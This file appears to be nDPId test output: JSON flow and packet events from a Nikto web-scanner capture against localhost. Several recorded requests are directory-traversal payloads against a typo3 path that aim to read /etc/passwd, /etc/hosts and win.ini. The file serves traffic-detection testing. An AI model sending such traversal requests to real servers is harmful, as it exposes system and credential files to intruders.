+01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} +01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 